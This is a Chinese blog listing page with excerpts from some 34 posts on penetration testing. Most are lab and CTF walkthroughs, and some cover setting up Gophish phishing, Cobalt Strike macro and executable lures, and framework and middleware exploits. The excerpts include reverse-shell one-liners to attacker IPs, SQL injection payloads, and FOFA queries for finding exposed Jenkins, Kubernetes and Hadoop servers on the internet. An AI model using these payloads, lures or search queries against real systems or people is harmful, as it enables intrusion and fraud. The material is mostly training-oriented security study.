自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(34)
  • 收藏
  • 关注

原创 钓鱼流程gophis

,但是实际攻击中,这会很容易被认出来,降低钓鱼攻击的成功率。可以注册与受害者邮箱域名类似的域名,然后搭建邮件服务器,再以此服务器来发送钓鱼邮件。进入主页面,第一次登录使用控制台中给的随机密码登录,之后会让自己设置一个密码,设置完密码后就进入了管理后台的主界面。接下来就是钓鱼页面的制作了,钓鱼页面是配合钓鱼邮件使用的,钓鱼邮件的最终目的,最好的方式就是使用自己的服务器,申请和正规网址的近似域名,搭建邮件服务器来发。: 是用来替换选定钓鱼邮件模板中超链接的值,该值指向部署了选定钓鱼页面的。

2025-08-11 20:17:34 912

原创 钓鱼鱼饵制作的方式

会在本地⽣成⼀个artifact.exe的可执⾏⽂件,将其发送给⽬标,诱导其点击,运⾏后即可上线。有效载荷--->Payload⽣成器--->选择Powershell Command--->⽣成。CobaltStrike--->有效载荷--->office宏--->选择监听器--->复制。创建Word⽂件--->试图--->宏(查看宏)--->创建宏--->复制宏代码--->保存。有效载荷--->Windows可执⾏程序--->选择监听器--->⽣成Generate。再次打开后即可上线。

2025-08-11 18:53:29 436

原创 cs的搭建和使用

服务运⾏完成后,在本地计算机打开Client客户端,尝试运⾏Cobalt_Strike_CN.bat或vbs,填写服务端 IP地址和连接密码。⽣成后会保存到指定地⽅,通过某种⽅式上传到对⽅机器上,可以通过Webshell⽅式等这⾥不在讲解了受害者运⾏exe⽂件我们的CS就直接上线了。如果⽆法上传⾄指定⽬录,可以先上传到/tmp临时⽬录后作移动。Windows Executable是⽣成Stager类型的⻢,选择监听器。进⼊解压的CS下的Server⽂件夹,给脚本赋予执⾏权限。3.设置监听器⽤来接收会话。

2025-08-11 17:33:28 173

原创 Beelzebub靶机

输入命令:wpscan --url=http://192.168.162.130/d18e1e22becbd915b45e0e655429d487/ --ignore-main-redirect --force -e --plugins-detection aggressive扫描出来两个用户。然后我们扫描一下敏感目录,输入:dirsearch -u http://192.168.162.130,看到成功扫描到这些目录。连接到远程的ssh后使用ls -a 命令查看发现了历史命令保存文件。

2025-08-10 00:56:38 147

原创 doubletrouble靶机

发现让我们输入密码,那么我们爆破一下这个图片的密码,输入:stegseek --crack doubletrouble.jpg /root/dict/rockyou.txt -xf output.txt。手先将我们的靶机下载下来下载地址:https://download.vulnhub.com/doubletrouble/doubletrouble.ova。发现只有一个虚拟机的文件 有意思 这一下就相当于做了两个靶场了先给他777的权限 不然是下载不了的。接着我们就可以准备一个x.php的木马文件。

2025-08-10 00:19:09 287

原创 drippingblues靶机

根据之前的提示需要drio,我们这里猜测需要用到drip来传参,我们再将第二个拒绝访问的目录作为参数拼接,获得了密码,第一个单词就是我们的密码。这里我们看到ftp允许匿名登录,所以我们尝试登录​​​​​​​现可以登录成功,我们可以看到有一个压缩文件,我们给他下下来看一下​​​​​​​。问一下第一个,告诉了一下我们怎么获取ssh密码,但是这里我们并不知道是哪几个歌词,第二个路径也访问不到。根据nmap之前扫描的结果我们可以看到有这两个目录,我们先访问一下robots目录,发现两个路径。

2025-08-09 22:47:30 250

原创 常见框架漏洞

过覆盖类的核⼼属性filter导致rce,其攻击点较为多,有些还具有限制条件,另外由于种种部分。Spring Data Rest 远程命令执⾏命令(CVE-2017-8046)vulhub靶场 /spring/CVE-2017-8046。vulhub靶场 /shiro/CVE-2016-4437。spring 代码执⾏ (CVE-2018-1273)反弹shell,和上⾯的下载shell.sh反弹⼀样。靶场:vulhub/thinkphp/5-rce。,然后抓取数据包,使⽤PATCH请求来修改。

2025-08-03 16:44:43 615

原创 Vulnhub ELECTRICAL靶机复现

在测试scan中的credentialed check时,点击其配置configuration,发现一个文本域,向下居然有内容,并且还是某一个的私钥,这个可能是靶机上的,也只是可能,需要进一步测试。输入密码进行登录,登录后发现是nessus的漏洞扫描的web界面,之前也搜索过对应版本的nessus漏洞,发现并没有可利用的,那么在这个web ui界面进行探测。继续看我们的登录界面,收集一下该网站的CMS,这里博主使用的是浏览器插件还有其他工具(CMSeek、CMSmap等)在凭据里面发现了ssh的用户名。

2025-08-03 16:42:46 266

原创 Vulnhub靶机 Noob渗透详细过程

下载镜像之后Noob.ova后,用VMware Workstation Pro打开依次点击文件-打开,选择我们刚才下载的ova文件打开,修改虚拟机名称及存储路径并导入。发现可以用 nano 编辑器,nano 编辑器允许二进制文件以超级用户身份运行sudo,它不会放弃提升的权限,并可用于访问文件系统、升级或维护特权访问。发现 funny.jpg图片中有隐写,密码推测的是另一个的文件名 “sudo” ,有个 user.txt 文件,提取隐藏的文件。查看FTP中的文件,ftp端口:登录账号,下载并查看其中内容。

2025-08-03 01:16:45 296

原创 Corrosion2靶机渗透教程

查看配置文件 tomcat-users.xml,找到两组账户密码分别为:manager/melehifokivai 和admin/melehifokivai尝试登入,登入成功!得到一个账号:randy 下载backup.zip发现需要密码尝试爆破和Corrosion1一样 得到密码:@administrator_hi5。渗透机:kali IP :192.168.229.129 靶机IP :192.168.229.130。使用命令:nmap -sS -sV -T4 -n -p- 192.168.0.100。

2025-08-03 00:07:01 254

原创 常见中间件漏洞

1.Tomcat环境搭建漏洞复现⾸⻚抓包,修改为 PUT ⽅式提交 Tomcat允许适⽤put⽅法上传任意⽂件类型,但不允许jsp后缀⽂件上传,因此我们需要配合 windows的默认的哥斯拉密码秘钥配置生成我们的木马包修改包将我们的木马写入,放行Webshell客户端⼯具进⾏连接1.2 后台弱⼝令部署war包环境搭建8漏洞复现制作WAR包制作WAR包,将JSP⽊⻢压缩为ZIP格式,然后修改后缀为war就可以了。上传我们的压缩包。

2025-07-31 20:03:34 508

原创 Thales靶机通关攻略

2.3.1kali进入msf:msfconsole,输入search tomcat login,进行设置后完成爆破。设置主机:set rhost 192.168.56.101,可访问端口只有8080,可以设置也可以不设置。点击这些注入点,查看有无注入点,发现点击应用程序列表,打开之后有一个可以上传WAR文件的功能点。输入run运行程序,爆破用户名和密码,发现有一条正确的用户名密码:tomcat:role1。登录需要爆破用户名和密码,使用msf进行操作。使用爆破出来的用户名和密码,登录。

2025-07-30 20:15:29 317

原创 ICA: 1靶场渗透测试

发现没有扫描到存活主机,我们重启靶机,在出现蓝色引导界面时,按下 e 键进入编辑模式,找到以 linux 或 linux16 开头的行,将 ro 替换为 rw init=/bin/bash,然后Ctrl+x 进入单用户模式,vim /etc/network/interfaces,编辑网卡发现网卡为enp0s3,需要修改为ens33。echo "/bin/bash" > /tmp/cat #在tmp目录下创建一个cat文件,写入/bin/bash命令。将ova格式靶场导入虚拟机,并设置为NAT模式。

2025-07-30 18:53:14 620

原创 常⻅CMS漏洞

观】 --》 【主题】 --》 【添加】 --》 【上传主题】 --》 【浏览】 --》 【现在安装】点击 【模块】 --》 【⼴告管理】 --》 【增加⼀个新⼴告】 --》在 【⼴告内容】 处添。登陆到后台点击 【核⼼】 --》 【⽂件式管理器】 --》 【⽂件上传】 将准备好的⼀句话代。点击 【扩展功能】 --》 【幻灯⽚设置】 --》点击 【保存】 --》开启代理进⾏抓包。点击【⼯具】--》 【⽂件管理】--》 【功能菜单】 --》【上传⽂件】--》 【解压】//⽇志保存状态开启;

2025-07-30 17:19:07 902

原创 breakout靶机攻略

都是这个登录页面,使用了不同的CMS版本,我们已知了密码,不知到用户名,使用枚举工具enum4linux来爆破用户名。翻译过来大概是:不要担心,他很安全,这是ook加密,最后解密过来就是: .2uqPEfj3D<P'a-3。发现这个有啥用呢,也没发现什么敏感的信息,正当我准备关闭的时候,按下了F12 发现了个不一样的东西。我们直接打开终端,通过查看目录,发现了一个user.txt打开它就得到了第一个flag。登入成功,既然是个文件管理系统,那不就好办了,可以知道网站上的所有文件。

2025-07-29 20:01:52 150

原创 Napping靶机渗透测试攻略

发现此处有个超级链接,点击后跳转到baidu.com。发现了我们输入的URL被嵌入了该页面并且作为跳转地址,而且target=_blank,表明是在新的地址跳转而且没有审核。在/var/www/html目录下放两个html文件,一个为站点首页(index.html),一个为钓鱼界面(test.html)在kali上wget下载的网站首页文件为.php,需要重命名为.html。写好我们的钓鱼界面后我们开启监听,访问kali下的网页,需要开启http服务并在kali监听端口,监听的端口为钓鱼页面里链接的端口。

2025-07-29 19:40:14 865

原创 redis拿shell的方式

(需要设置utf-8编码)使⽤⼯具执⾏以下命令获取⽬标的命令执⾏环境,交互时输⼊。之后监听8888端口,等一会就是收到一个shell。安装redis4.0。

2025-07-28 20:49:31 247

原创 未授权访问漏洞攻略

在fofa中搜索 port="8080" && app="JENKINS" && title=="Dashboard [Jenkins]"在fofa中搜索"Jupyter Notebook" && port="8888" && "terminals"在fofa中搜索port="8080" && app="Kubernetes"在fofa中搜索body="ActiveMQ" && port="8161"在fofa中搜索port="8088" && app="Hadoop"

2025-07-28 19:58:57 712

原创 Vulnhub-jangow-01-1.0.1靶场练习

输入vim /etc/network/interfaces,然后把enp0s17改为ens33,保存退出(按shift+?安装靶机后我们发现我们扫描不到靶机的ip,所以我们需要修改靶机的配置文件,打开靶机选择进行配置,系统启动时,长按shift键,选择第二个选项回车。仅右上角的“Buscar“,点击后出现空白页面,但URL处有参数buscar,可能有用。点e进入编辑页面,把ro改成rw signie init=/bin/bash。buscar页面就换链接了,在URL处似乎有突破点,漏洞利用查看当前目录。

2025-07-27 17:48:12 196

原创 Red:1靶场环境部署及其渗透测试

接下来就是破解密码了,网上找的方法是先建立pass.txt文件,将之前配置文件那个密码放入,然后利用hashcat对应的base64规则去枚举相关的密码,存入passlist.txt中,格式是类似于之前获得的那个密码的,最好利用hydra进行爆破,获得对应的密码。开始信息收集,进行目录扫描,用dirb和御剑没扫出来有用的,查看源代码发现可以向这个人寻求帮助,google搜索了下这个人,出现了gihub的一个工具,也是用来收集信息的。利用同样的方式读取,并且解码后,获得了文件内容,并且找到了用户和密码。

2025-07-27 16:36:21 317

原创 Earth靶场

打开后我们拿到了一个用户名 terra,并且这里告诉了我们一个加密方式是利用XOR异或方式加密的 加密算法是XOR,用户名是terra,访问https://terratest.earth.local/testdata.txt。得到user的flag,还要得到password的flag,我们就要利用命令执行来进行一个反弹shell使用命令bash -i >& /dev/tcp/192.168.21.135/6666 0>&1。使用如下命令,进行主机探测,成功发现靶机(arp-scan -l)

2025-07-26 23:02:27 377

原创 Cmseasy和大米cms的金额支付逻辑漏洞

选购任意商品为选择其购买的数量为-1,填写联系方式完成购物 价格正数时需要我们付款 价格为负数时网站给我们付款。在本地搭建好我们的靶场以后访问我们的Cmseasy的靶机,安装初始的数据。因为商品数量为负数,网站并不会承认这种订单,但是钱到了,可以去买正数的。选购商品,将数量改为负数 站内扣款 实现网站给我们的账户充钱。我们点击注册,注册我们的账户成功后登录我们的账户。订单提交成功以后,我们查看余额到账。查看我们的订单,订单依旧存在。注册账户登录 账户余额为0。在买一遍来实现我们的零元购。

2025-07-25 16:44:09 293

原创 vulhub/Web Machine(N7)靶机----练习攻略

kali扫描敏感目录gobuster dir -u http://172.16.2.72 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html,.zip。访问 ip/enter_network,输入admin、任意密码,点击SEND。打开BP,再访问ip/enter_network /admin.php,把包发送到重发器,修改role值改为admin,点击发送,发现页面显示出另外一半FLAG。

2025-07-24 20:17:32 162

原创 Vulnhub靶场之matrix-breakout-2-morpheus

这两个文件都没有给我们什么信息,因为robot.txt提示我们继续找找,可能是因为我们的字典太小了,我们换个扫描器换个字典试下,利用kali自带的最大的一个字典,输入。可以看我们的网络编辑器,查看本机IP,靶机跟kali都是使用NAT模式,所以看一下本机IP,扫一下IP段就可以看到靶机的IP了。抓包尝试,尝试输入1提交,并打开burp抓包啊查看,发现网站会将提交的内容追加到graffiti.txt文件中。上传了我们的一句话木马后我们访问我们的shell.php文件,可以使用后我们用蚁剑来连接。

2025-07-24 18:13:40 143

原创 CTFHub技能树-web进阶-Bypass disable_function

在根⽬录发现flag,是空的 可能是权限不够, readflag⽂件仍然是读取flag。发现第三个插件可以,并且直接把我们带到了终端,我输入/readflag查找我们的钥匙。我们进入环境发现页面的一句话木马,我们可以先用蚁剑连接。我们进入环境发现页面的一句话木马,我们可以先用蚁剑连接。后面的流程和上面一样我们直接使用蚁剑的插件来绕过。我们使用蚁剑开始来连接我们的一句话木马。我们使用蚁剑开始来连接我们的一句话木马。我们使用蚁剑开始来连接我们的一句话木马。我们打开环境,和上面一样用蚁剑来连接。

2025-07-24 16:43:31 133

原创 log4j2漏洞复现

反弹shell,我们输入代码bash -i >& /dev/tcp/59.110.18.85/6666 0>&1,进行base64编码。访问我们的页面,开启的端口为8983,访问网址​http://59.110.18.85:8983/solr/#/们⽣成了恶意代码类,并且⽣成了对应的url,然后我们就可以回到刚才的⽹站去进⾏JNDI注⼊...我们可以看到留下了访问记录并且前⾯的参数被执⾏后给我们回显了java的 版本号!先在⾃DNSLOG平台上获取⼀个域名来监控我们注⼊的效果。命令查看权限,发现已经成功。

2025-07-23 18:49:00 346

原创 中间件解析漏洞

1.IIS解析漏洞。

2025-07-22 20:22:24 611

原创 Tomato 文件包含漏洞靶机 通关攻略

下载靶机ova文件解压导入VMware,修改该虚拟机的网卡模式为NAT模式。

2025-07-21 18:44:35 282

原创 AI-web-1.0靶机渗透攻略

10.查看字段输入代码1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='aiweb1' and table_name='systemUser'--+11.查看表里的数据1' union select 1,2,group_concat(userName,'~',password) from systemUser--+12.上传一句话木马。

2025-07-20 19:14:37 237

原创 upload-labs详解通关全解

根据题目提示为文件后缀(空)绕过,通过bp修改文件名(在后缀多加几个空格)并绕过(Windows文件流绕过)这里有一个我们上传的文件和一个保存上传文件的名称我们需要把我们上传的文件改成/.上传以后这里有一个文件包含漏洞,我们将我们上传的文件引入到这里即可。上传以后这里有一个文件包含漏洞,我们将我们上传的文件引入到这里即可。上传以后这里有一个文件包含漏洞,我们将我们上传的文件引入到这里即可。上传以后这里有一个文件包含漏洞,我们将我们上传的文件引入到这里即可。

2025-07-20 17:55:23 468

原创 xxe靶机攻略

将得到的东西进行base64解码,可以看到username和password还有flag。将得到的编码放进一个php文件中在页面进行访问就可以得到SAFCSP{*******}4.通过观察可以发现可以使用xml代码,我们输入代码。1.安装靶机后搜索端口,查看靶机的子网然后扫描端口。将得到数据进行base32解码后再使用64位解码。把flag放入抓的包中,使用ctf工具解码。知道端口为136,访问端口为136的页面。3.输入账号和密码后可以进行bp抓包。得到以后我们可以直接访问。2.使用御剑扫描子域名。

2025-07-17 20:22:34 187

原创 CTFHub技能树-ssrf通关攻略

得到包以后我们需要像上面一样进行修改然后进行url编码,我们需要二次编码需要先修改文件格式将编码后数据中的%0A全都换成%0D%0A并在末尾手动加%0D%0A,然后再进行编码将二次编码后的数据贴后访问就能得到flag。我们需要二次编码需要先修改文件格式将编码后数据中的%0A全都换成%0D%0A并在末尾手动加%0D%0A,然后再进行编码将二次编码后的数据贴后访问就能得到。需要我们访问得到位于web目录下的flag.php,所以访问file:///var/www/html/flag.php即可。

2025-07-17 19:06:59 924

原创 墨家学者靶场教学

1 union select (select column name from user tab columns where rownum=1 andtable name='sns users),'null' from dual //查询sns users表的第一个字段名称 USER NAME。return({'title':tojson(db.Authority confidential.find([0]),'content':'2 //查询表的字段的值。

2025-07-14 19:37:52 570

原创 sqli-labs通关攻略(持续更新中)

(注意此处的from开始,也就是查询的条件要放到回显点3后,放到所有的列最后面)4.查看数据库表里的数据?7.接下来就要查询表中列的名称,在同样的位置使用语句-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security'and table_name='users'--+查出有如下列名id,username,password。

2025-07-09 20:50:33 576

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除